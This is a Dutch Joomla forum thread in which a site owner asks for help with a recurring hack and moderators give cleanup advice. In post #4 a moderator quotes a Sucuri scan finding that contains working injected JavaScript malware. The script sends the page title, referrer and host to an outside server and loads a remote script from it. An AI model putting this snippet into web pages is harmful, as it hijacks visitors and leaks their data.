Joomla!NL - beveiliging - Forum Joomla!NL

beveiliging

07 dec 2015 13:45

#1

Enkele weken terug was mijn site gehackt. Alles opnieuw beveiligd, extra wachtwoorden, extra extensies om te beveiligen ..... maar enkele dagen later opnieuw hetzelfde.
Mijn pc is volledig onder handen genomen, niets gevonden - backups teruggezet en ook nagekeken, niets gevonden.
Voor alle veiligheid ben ik dan van hosting veranderd en heb daar ook nog eens extra beveiliging bijgenomen.
Alles werkt terug, maar nu merk ik dat er toch nog malware te vinden is en dus ben ik er niet echt gerust in.
Iemand ervaring om malware te verwijderen uit de website en hoe kan ik best starten?
Heb ook RSFirewall op mijn site geinstalleerd en ik bekijk elke dag de scan - er wordt niets speciaals gevonden, maar via sitecheck.sucuri.net/ wordt er toch nog malware gedetecteerd.

Discussie gesloten.

cb
Heeft onderwerp gestart
Regelmatige bezoeker van Joomla!NL
Berichten: 311

beveiliging

07 dec 2015 13:59

#2

Zet even tussen codetags je URL van de betreffende site.

Groeten, Jelle

Voordat je een vraag post, gebruik eerst de zoekfunctie van ons forum eens.
Vragen uitsluitend via dit Forum.

Is je vraag opgelost? Dan kan je hem zelf sluiten .
Wil je Joomla!NL steunen? Dat kan met een donatie.

Discussie gesloten.

Jelle
Algemeen Moderator
Berichten: 13653

beveiliging

07 dec 2015 14:23

#3

Code:

http://www.janitor.be

Discussie gesloten.

cb
Heeft onderwerp gestart
Regelmatige bezoeker van Joomla!NL
Berichten: 311

beveiliging

07 dec 2015 14:28 - 07 dec 2015 14:31

#4

Klopt niet schoon.

Code:

Known javascript malware. Details: http://sucuri.net/malware/entry/MW:JS:GEN2?web.js.malware.fake_jquery.001
<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://vps36773.ovh.net/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>

Deze afbeelding is verborgen voor gasten.
Login of registreer om deze te zien.

Groeten, Jelle

Voordat je een vraag post, gebruik eerst de zoekfunctie van ons forum eens.
Vragen uitsluitend via dit Forum.

Is je vraag opgelost? Dan kan je hem zelf sluiten .
Wil je Joomla!NL steunen? Dat kan met een donatie.

Laatst bewerkt 07 dec 2015 14:31 door Jelle.

Discussie gesloten.

Jelle
Algemeen Moderator
Berichten: 13653

beveiliging

07 dec 2015 14:46

#5

Zo heb ik het ook ondervonden, door op mijn laptop de site te openen en daarop staat ook avast.
Anders had ik het helemaal niet geweten. Die code heb ik ook gevonden en zou volgens mijn opzoekwerk ergens in een index.html moeten zitten, maar zo zitten er heel veel in en is er een manier om te zoeken naar bepaalde tekst binnen files op een website.

Discussie gesloten.

cb
Heeft onderwerp gestart
Regelmatige bezoeker van Joomla!NL
Berichten: 311

beveiliging

07 dec 2015 14:52

#6

Als je het volgende goed gedaan hebt en het helpt niet.

Zorg ervoor dat je PC Spy- en Malware vrij is.
Zet een goede recente backup terug.
wijzig al je wachtwoorden.
update je site naar de nieuwste versie van Joomla en vergeet ook niet alle extensies mee te nemen.
Maak meteen een nieuwe backup.

Maar Hackers verstoppen malware vaak heel diep, dus het opschonen van 1 bestand is meestal zinloos.
Je kunt het beste het advies in #4 van dit draadje opvolgen.
forum.joomlanl.nl/forum/3-x-installatie-...-hack-one-com#128432

Groeten, Jelle

Voordat je een vraag post, gebruik eerst de zoekfunctie van ons forum eens.
Vragen uitsluitend via dit Forum.

Is je vraag opgelost? Dan kan je hem zelf sluiten .
Wil je Joomla!NL steunen? Dat kan met een donatie.

Discussie gesloten.

Jelle
Algemeen Moderator
Berichten: 13653

beveiliging

07 dec 2015 15:04 - 07 dec 2015 15:10

#7

Wat ik heb gedaan:
mijn pc spy- en malware vrij gemaakt - zo goed als elke dag
recente backup's terug gezet - maar vermits ik niet weet waar mijn besmette files inzitten heeft dat niet zo veel zin ....
Alle wachtwoorden gewijzigd, en heel uitgebreid gewijzigd
updates worden altijd uitgevoerd
backups zo goed als elke dag

Ik heb wel nog oude backups liggen en dus zou ik die ook kunnen terugzetten en uittesten.
Dan heb ik het advies gelezen (Je kunt het beste het advies in #4 van dit draadje opvolgen en dat zie ik niet onmiddellijk zitten, want ziet er een heel werk uit. Maar lukt het niet om op een andere manier alles eruit te halen dan zal ik toch iets moeten - dus dat belooft weeral een heel pak werk voor de volgende dagen!
Edit Astrid: Ik heb de link klikbaar gemaakt.

Laatst bewerkt 07 dec 2015 15:10 door Astrid.

Discussie gesloten.

cb
Heeft onderwerp gestart
Regelmatige bezoeker van Joomla!NL
Berichten: 311

beveiliging

07 dec 2015 15:11

#8

Het is maar een tip hoor. Maar als jij je bezig wilt houden met het terugzetten van oude backups, net zo lang tot je een (op het oog) schone versie te pakken hebt, dan mag dat natuurlijk ook. En zoveel werk is het nou ook weer niet om de tip uit dat andere draadje te volgen.

Groetjes, Astrid

Gebruik de zoekfunctie van dit forum voordat je een nieuwe vraag plaatst.
Vragen uitsluitend via dit forum.
yndi.nl - kvk 17157725

Is je vraag beantwoord? Dan kan je het draadje zelf sluiten .
Wil je Joomla!NL steunen? Dat kan met een donatie.

Discussie gesloten.

Astrid
Moderator + Technisch team
Berichten: 37750

Laatste nieuws

Welkom bij Joomla!NL

beveiliging

beveiliging

beveiliging

beveiliging

beveiliging

beveiliging

beveiliging

beveiliging

beveiliging

Laatste forumberichten

Wil je Joomla!NL steunen?